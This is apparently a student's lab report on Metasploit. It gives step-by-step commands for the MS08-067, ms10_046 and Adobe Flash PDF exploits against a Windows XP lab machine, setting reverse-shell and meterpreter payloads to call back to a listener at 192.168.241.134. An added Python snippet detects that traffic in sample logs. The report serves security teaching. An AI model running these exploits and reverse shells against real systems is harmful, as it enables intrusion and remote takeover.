20155210 Exp5 MSF basic application

Active attack practice: MS08-067

  • First, run msfconsole to start the msf console

  • Then use search MS08-067 to search for the vulnerability; the corresponding exploit module is displayed

As shown in the figure:

  • According to the figure above, we enter use exploit/windows/smb/ms08_067_netapi to select the corresponding module

  • Then we can use show payloads to see the payloads that can be used with this module

As shown in the figure:

  • Then, according to the figure above, to obtain a shell on the target machine, use set payload generic/shell_reverse_tcp

  • Then enter show options to check the configuration; we learn that we need to configure RHOST, LHOST, LPORT and target, as shown in the
    figure:

  • Enter the following to configure them:

    set RHOST 192.168.241.138
    set LHOST 192.168.241.134
    set LPORT 5210

  • Then we use show options again to view the configuration, as shown in the
    figure:

  • Then enter exploit to run the module and wait for the connection

As shown in the figure:

  • If the following situation occurs, it can be solved by turning off the firewall

Browser-targeted attacks: ms10_046

  • At first, I planned to use ms11_050 to attack the IE browser, but it could not succeed against IE 8.0. It may be that IE 8.0 has fixed the related vulnerabilities.

  • So I chose ms10_046 and first entered search ms10_046 to find the vulnerability

As shown in the figure:

  • Since we are going to attack the browser, we enter use exploit/windows/browser/ms10_046_shortcut_icon_

  • Then we enter show payloads to check which payload to choose; here I still use the payload from Experiment 1, set payload generic/shell_reverse_tcp

As shown in the figure:

  • Running show options shows that we need to configure LPORT, LHOST and SRVHOST

  • Enter the following to configure them:

    set SRVHOST 192.168.241.134
    set LHOST 192.168.241.134
    set LPORT 5210

  • Check the configuration information again

As shown in the figure:

  • Then enter exploit, which generates a URL

As shown in the figure:

  • Access the URL on the Windows side; the kali side is shown in the figure:

  • Enter sessions; you can see a connection with ID 1, as shown in the
    figure:

  • Then enter sessions -i 1 to interact with the session with ID 1, enter the shell, and obtain it successfully.
    As shown in the figure:

Attacks on Clients

  • First, use search adobe to search, as shown in the
    figure:

  • Then make a selection; I chose use windows/fileformat/adobe_flashplayer_button

  • Then set payload windows/meterpreter/reverse_tcp to set the payload to use, and use show options to view the information to be configured, as shown in the
    figure:

  • Enter the following to configure LHOST, LPORT and FILENAME:

    set LHOST 192.168.241.134
    set LPORT 5210
    set FILENAME 20155210.pdf

  • Enter exploit to generate the 20155210.pdf file, as shown in the
    figure:

  • Enter use exploit/multi/handler to set up the listener, and set the listening port and host address

  • On the Windows side, open 20155210.pdf; it connects back successfully, as shown in the
    figure:
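As an added example (not part of this report or of Metasploit), the following Python checks constructed firewall-style connection records for the two network events the three attacks above produce on the wire: the ms08-067 exploit arriving over SMB from the kali host, and the reverse_tcp payload calling back to LHOST 192.168.241.134 on LPORT 5210. The log line format, the timestamps and the source ports are assumptions made for the sample.

```python
import re

LAB_LHOST = "192.168.241.134"   # attacker (kali) address set with `set LHOST`
LAB_LPORT = 5210                # listener port set with `set LPORT`
SMB_PORT = 445                  # ms08-067 (netapi) is delivered over SMB

# Hypothetical firewall/netflow export format, one connection record per line.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+) sport=(?P<sport>\d+) "
    r"dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+) proto=(?P<proto>\w+)$"
)

def parse_line(line):
    # Return a dict for a matching record, None for anything else.
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec

def classify(rec):
    # Label records matching the lab's attack pattern; None otherwise.
    if rec["proto"] != "tcp":
        return None
    if rec["src"] == LAB_LHOST and rec["dport"] == SMB_PORT:
        return "smb-exploit-delivery"      # attacker -> target:445 (ms08-067)
    if rec["dst"] == LAB_LHOST and rec["dport"] == LAB_LPORT:
        return "reverse-shell-callback"    # target -> attacker:5210 (payload)
    return None

def scan(lines):
    # Return (label, record) for every suspicious record, in log order.
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            label = classify(rec)
            if label:
                hits.append((label, rec))
    return hits

# Constructed sample: the XP target 192.168.241.138 is exploited over SMB, then calls back.
SAMPLE_LOG = """\
2023-05-01T10:00:01 src=192.168.241.138 sport=1034 dst=192.168.241.2 dport=53 proto=udp
2023-05-01T10:00:05 src=192.168.241.134 sport=41022 dst=192.168.241.138 dport=445 proto=tcp
2023-05-01T10:00:06 src=192.168.241.138 sport=1035 dst=192.168.241.134 dport=5210 proto=tcp
""".splitlines()
```

Calling scan(SAMPLE_LOG) returns the SMB delivery record followed by the callback record; the DNS lookup is ignored.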

Auxiliary module application

  • First use show auxiliary to view the auxiliary modules

  • I chose scanner/dns/dns_amp to scan DNS

  • Enter show options to view the configuration

  • Enter exploit to run the scan

Basic questions

  • Explain in your own words what exploit, payload and encode are

  • Exploit: aimed at a vulnerability in the target machine, it uses the backdoor on the target machine to attack the target machine

  • Payload: equivalent to the predecessor of shellcode; it is the template of the backdoor

  • Encode: encodes the payload

Experimental experience

We should try our best to update software and systems to the latest versions; otherwise it gives hackers an opportunity.

For example, the experiments we did were all based on the XP system; if we attacked Win7, 8 or 10, they would fail.

For example, when I was doing experiment 2, I wanted to do the example given by the teacher, but that vulnerability was not easy to use against IE 8.0.

We do not have a penetration attack library that can target current systems or software, and this is still far from real-world practice.
